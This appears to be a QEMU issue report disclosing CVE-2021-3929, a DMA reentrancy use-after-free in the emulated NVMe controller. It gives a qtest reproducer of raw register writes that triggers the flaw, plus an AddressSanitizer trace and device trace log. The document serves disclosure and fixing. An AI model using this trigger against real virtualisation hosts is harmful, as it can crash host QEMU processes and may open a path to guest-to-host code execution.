nvme: DMA reentrancy issue leads to use-after-free (CVE-2021-3929)
Description of problem
A DMA reentrancy issue was found in the NVM Express Controller (NVMe) emulation. nvme_tx() in hw/nvme/ctrl.c can call dma_buf_write() or dma_buf_read() without checking whether the destination region overlaps with the device's own MMIO region. This is similar to CVE-2021-3750 (#541, closed): when the reentrant write triggers the reset function nvme_ctrl_reset(), data structures that are still in use are freed, leading to a use-after-free. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition, or potentially to execute arbitrary code within the context of the QEMU process on the host.
This issue was reported by Qiuhao Li.
Reproducer
cat << EOF | ./qemu-system-x86_64 -display none -machine accel=qtest \
-machine q35 -nodefaults -drive file=null-co://,if=none,format=raw,id=disk0 \
-device nvme,drive=disk0,serial=1 -qtest stdio
outl 0xcf8 0x80000810 /* MLBAR (BAR0) – Memory Register Base Address, lower 32-bits */
outl 0xcfc 0xe0000000 /* MMIO Base Address = 0xe0000000 */
outl 0xcf8 0x80000804 /* CMD - Command */
outw 0xcfc 0x06 /* Bus Master Enable, Memory Space Enable */
write 0xe0000024 0x4 0x02000200 /* [3] 3.1.8, Admin Queue Attributes */
write 0xe0000028 0x4 0x00100000 /* asq = 0x1000 */
write 0xe0000030 0x4 0x00200000 /* acq = 0x2000 */
write 0xe0000014 0x4 0x01004600 /* [3] 3.1.5, Controller Configuration, start ctrl */
write 0xe0001000 0x1 0x01 /* [3] 3.1.24, SQyTDBL – Submission Queue y Tail Doorbell */
write 0x1000 0x1 0x02 /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */
write 0x1018 0x4 0x140000e0 /* prp1 = 0xe0000014, NVME_REG_CC, nvme_ctrl_reset() */
write 0x1028 0x4 0x03000004 /* cmd->cdw10, lid = 3 NVME_LOG_FW_SLOT_INFO, nvme_fw_log_info, buf_len = 4 */
write 0x1030 0x4 0xfc010000 /* cmd->cdw12 = 0x1fc, Log Page Offset, trans_len = sizeof(fw_log) - 0x1fc = 4 */
clock_step
EOF
Stack trace
==2682052==ERROR: AddressSanitizer: heap-use-after-free on address 0x616000023d98 at pc 0x56450178ef09 bp 0x7ffc3f0fa330 sp 0x7ffc3f0fa328
WRITE of size 2 at 0x616000023d98 thread T0
#0 0x56450178ef08 in nvme_process_sq ../hw/nvme/ctrl.c:5549:25
#1 0x5645031e960e in timerlist_run_timers ../util/qemu-timer.c:573:9
#2 0x5645031e993c in qemu_clock_run_timers ../util/qemu-timer.c:587:12
#3 0x5645022f3bc4 in qtest_clock_warp ../softmmu/qtest.c:372:9
#4 0x5645022f254d in qtest_process_command ../softmmu/qtest.c:768:9
#5 0x5645022e5ffd in qtest_process_inbuf ../softmmu/qtest.c:813:9
#6 0x5645022f5d3e in qtest_read ../softmmu/qtest.c:825:5
#7 0x564502ed866d in qemu_chr_be_write_impl ../chardev/char.c:201:9
#8 0x564502ed8729 in qemu_chr_be_write ../chardev/char.c:213:9
#9 0x564502ee48a5 in fd_chr_read ../chardev/char-fd.c:73:9
#10 0x56450297b5ec in qio_channel_fd_source_dispatch ../io/channel-watch.c:84:12
#11 0x7f603c5d57c3 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x557c3)
#12 0x5645031c2519 in glib_pollfds_poll ../util/main-loop.c:232:9
#13 0x5645031c1753 in os_host_main_loop_wait ../util/main-loop.c:255:5
#14 0x5645031c131c in main_loop_wait ../util/main-loop.c:531:11
#15 0x56450227faf3 in qemu_main_loop ../softmmu/runstate.c:726:9
#16 0x564500d508de in main ../softmmu/main.c:50:5
#17 0x7f603bdd5fcf in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#18 0x7f603bdd607c in __libc_start_main csu/../csu/libc-start.c:409:3
#19 0x564500c9fa54 in _start (qemu-system-x86_64+0x1a4ba54)
0x616000023d98 is located 24 bytes inside of 624-byte region [0x616000023d80,0x616000023ff0)
freed by thread T0 here:
#0 0x564500d1bfa2 in __interceptor_free (qemu-system-x86_64+0x1ac7fa2)
#1 0x5645017d0a46 in nvme_free_sq ../hw/nvme/ctrl.c:3934:5
#2 0x56450177ec52 in nvme_ctrl_reset ../hw/nvme/ctrl.c:5571:13
#3 0x564501778374 in nvme_write_bar ../hw/nvme/ctrl.c:5817:13
#4 0x564501775d00 in nvme_mmio_write ../hw/nvme/ctrl.c:6167:9
#5 0x56450228b9a3 in memory_region_write_accessor ../softmmu/memory.c:492:5
#6 0x56450228b2e1 in access_with_adjusted_size ../softmmu/memory.c:554:18
#7 0x564502289bf6 in memory_region_dispatch_write ../softmmu/memory.c:1504:16
#8 0x56450225b003 in flatview_write_continue ../softmmu/physmem.c:2779:23
#9 0x564502249b8f in flatview_write ../softmmu/physmem.c:2819:14
#10 0x564502249718 in address_space_write ../softmmu/physmem.c:2911:18
#11 0x564502249eb7 in address_space_rw ../softmmu/physmem.c:2921:16
#12 0x564500f3c33d in dma_memory_rw_relaxed ../include/sysemu/dma.h:88:12
#13 0x564500f3bee0 in dma_memory_rw ../include/sysemu/dma.h:127:12
#14 0x564500f385dd in dma_buf_rw ../softmmu/dma-helpers.c:309:9
#15 0x564500f38187 in dma_buf_read ../softmmu/dma-helpers.c:320:12
#16 0x56450175652f in nvme_tx ../hw/nvme/ctrl.c:1154:24
#17 0x5645017c4084 in nvme_c2h ../hw/nvme/ctrl.c:1189:12
#18 0x5645017d42e4 in nvme_fw_log_info ../hw/nvme/ctrl.c:4140:12
#19 0x5645017c8378 in nvme_get_log ../hw/nvme/ctrl.c:4287:16
#20 0x564501790e65 in nvme_admin_cmd ../hw/nvme/ctrl.c:5492:16
#21 0x56450178ee33 in nvme_process_sq ../hw/nvme/ctrl.c:5547:13
#22 0x5645031e960e in timerlist_run_timers ../util/qemu-timer.c:573:9
#23 0x5645031e993c in qemu_clock_run_timers ../util/qemu-timer.c:587:12
#24 0x5645022f3bc4 in qtest_clock_warp ../softmmu/qtest.c:372:9
#25 0x5645022f254d in qtest_process_command ../softmmu/qtest.c:768:9
#26 0x5645022e5ffd in qtest_process_inbuf ../softmmu/qtest.c:813:9
#27 0x5645022f5d3e in qtest_read ../softmmu/qtest.c:825:5
#28 0x564502ed866d in qemu_chr_be_write_impl ../chardev/char.c:201:9
#29 0x564502ed8729 in qemu_chr_be_write ../chardev/char.c:213:9
previously allocated by thread T0 here:
#0 0x564500d1c3a2 in __interceptor_calloc (qemu-system-x86_64+0x1ac83a2)
#1 0x7f603c5de5b0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x5e5b0)
#2 0x56450177e5e6 in nvme_start_ctrl ../hw/nvme/ctrl.c:5711:5
#3 0x564501778293 in nvme_write_bar ../hw/nvme/ctrl.c:5808:17
#4 0x564501775d00 in nvme_mmio_write ../hw/nvme/ctrl.c:6167:9
#5 0x56450228b9a3 in memory_region_write_accessor ../softmmu/memory.c:492:5
#6 0x56450228b2e1 in access_with_adjusted_size ../softmmu/memory.c:554:18
#7 0x564502289bf6 in memory_region_dispatch_write ../softmmu/memory.c:1504:16
#8 0x56450225b003 in flatview_write_continue ../softmmu/physmem.c:2779:23
#9 0x564502249b8f in flatview_write ../softmmu/physmem.c:2819:14
#10 0x564502249718 in address_space_write ../softmmu/physmem.c:2911:18
#11 0x5645022f06ea in qtest_process_command ../softmmu/qtest.c:670:9
#12 0x5645022e5ffd in qtest_process_inbuf ../softmmu/qtest.c:813:9
#13 0x5645022f5d3e in qtest_read ../softmmu/qtest.c:825:5
#14 0x564502ed866d in qemu_chr_be_write_impl ../chardev/char.c:201:9
#15 0x564502ed8729 in qemu_chr_be_write ../chardev/char.c:213:9
#16 0x564502ee48a5 in fd_chr_read ../chardev/char-fd.c:73:9
#17 0x56450297b5ec in qio_channel_fd_source_dispatch ../io/channel-watch.c:84:12
#18 0x7f603c5d57c3 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x557c3)
SUMMARY: AddressSanitizer: heap-use-after-free ../hw/nvme/ctrl.c:5549:25 in nvme_process_sq
Shadow bytes around the buggy address:
0x0c2c7fffc760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc770: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc790: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2c7fffc7b0: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c2c7fffc800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2682052==ABORTING
Trace events
[I 1635691481.877984] OPENED
cpu_get_apic_base 0x00000000fee00900
cpu_get_apic_base 0x00000000fee00900
cpu_get_apic_base 0x00000000fee00900
[R +0.039936] outl 0xcf8 0x80000810 /* MLBAR (BAR0) – Memory Register Base Address, lower 32-bits */
cpu_out addr 0xcf8(l) value 2147485712
OK
[S +0.039968] OK
[R +0.039983] outl 0xcfc 0xe0000000 /* MMIO Base Address = 0xe0000000 */
cpu_out addr 0xcfc(l) value 3758096384
pci_cfg_write nvme 01:0 @0x10 <- 0xe0000000
OK
[S +0.040008] OK
[R +0.040018] outl 0xcf8 0x80000804 /* CMD - Command */
cpu_out addr 0xcf8(l) value 2147485700
OK
[S +0.040024] OK
[R +0.040031] outw 0xcfc 0x06 /* Bus Master Enable, Memory Space Enable */
cpu_out addr 0xcfc(w) value 6
pci_cfg_write nvme 01:0 @0x4 <- 0x6
pci_update_mappings_add d=0x62900000f200 00:01.0 0,0xe0000000+0x4000
OK
[S +0.041034] OK
[R +0.041059] write 0xe0000024 0x4 0x02000200 /* [2] 3.1.8, Admin Queue Attributes */
pci_nvme_mmio_write addr 0x24 data 0x20002 size 4
pci_nvme_mmio_aqattr wrote MMIO, admin queue attributes=0x20002
OK
[S +0.041078] OK
[R +0.041083] write 0xe0000014 0x4 0x01004600 /* [2] 3.1.5, Controller Configuration */
pci_nvme_mmio_write addr 0x14 data 0x460001 size 4
pci_nvme_mmio_cfg wrote MMIO, config controller config=0x460001
pci_nvme_setfeat_timestamp set feature timestamp = 0x0
pci_nvme_mmio_start_success setting controller enable bit succeeded
OK
[S +0.041116] OK
[R +0.041124] write 0xe0001000 0x1 0x01 /* [2] 3.1.24, SQyTDBL – Submission Queue y Tail Doorbell */
pci_nvme_mmio_write addr 0x1000 data 0x1 size 2
pci_nvme_mmio_doorbell_sq sqid 0 new_tail 1
OK
[S +0.041143] OK
[R +0.041154] write 0x00 0x1 0x02 /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */
OK
[S +0.041532] OK
[R +0.041557] write 0x18 0x4 0x140000e0 /* prp1 = 0xe0000014, NVME_REG_CC, nvme_ctrl_reset() */
OK
[S +0.041564] OK
[R +0.041571] write 0x28 0x4 0x03000004 /* cmd->cdw10, lid = 3 NVME_LOG_FW_SLOT_INFO, nvme_fw_log_info, buf_len = 4 */
OK
[S +0.041575] OK
[R +0.041582] write 0x30 0x4 0xfc010000 /* cmd->cdw12 = 0x1fc, Log Page Offset, trans_len = sizeof(fw_log) - 0x1fc = 4 */
OK
[S +0.041587] OK
[R +0.041591] clock_step
pci_nvme_admin_cmd cid 0 sqid 0 opc 0x2 opname 'NVME_ADM_CMD_GET_LOG_PAGE'
pci_nvme_get_log cid 0 lid 0x3 lsp 0x0 rae 0x0 len 4100 off 508
pci_nvme_map_prp trans_len 4 len 4 prp1 0xe0000014 prp2 0x0 num_prps 1
pci_nvme_map_addr addr 0xe0000014 len 4
pci_nvme_mmio_write addr 0x14 data 0x0 size 4
pci_nvme_mmio_cfg wrote MMIO, config controller config=0x0
pci_nvme_mmio_stopped cleared controller enable bit